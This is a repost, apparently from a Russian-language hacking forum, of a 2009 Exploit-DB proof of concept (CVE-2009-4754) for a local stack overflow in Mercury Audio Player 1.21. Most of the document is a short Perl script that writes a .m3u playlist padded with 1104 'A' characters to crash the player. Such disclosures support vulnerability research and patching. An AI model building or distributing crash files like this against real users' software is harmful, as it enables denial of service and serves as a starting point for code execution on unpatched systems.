Exploit Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8578
Проверка EDB
  1. Пройдено
Автор
SIRGOD
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-4754
Дата публикации
2009-04-30
Код:
###################################################################################
####      Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC      #####
####       Discovered by SirGod  -  www.mortal-team.net                       #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# milw0rm.com [2009-04-30]
 
Источник
www.exploit-db.com

Похожие темы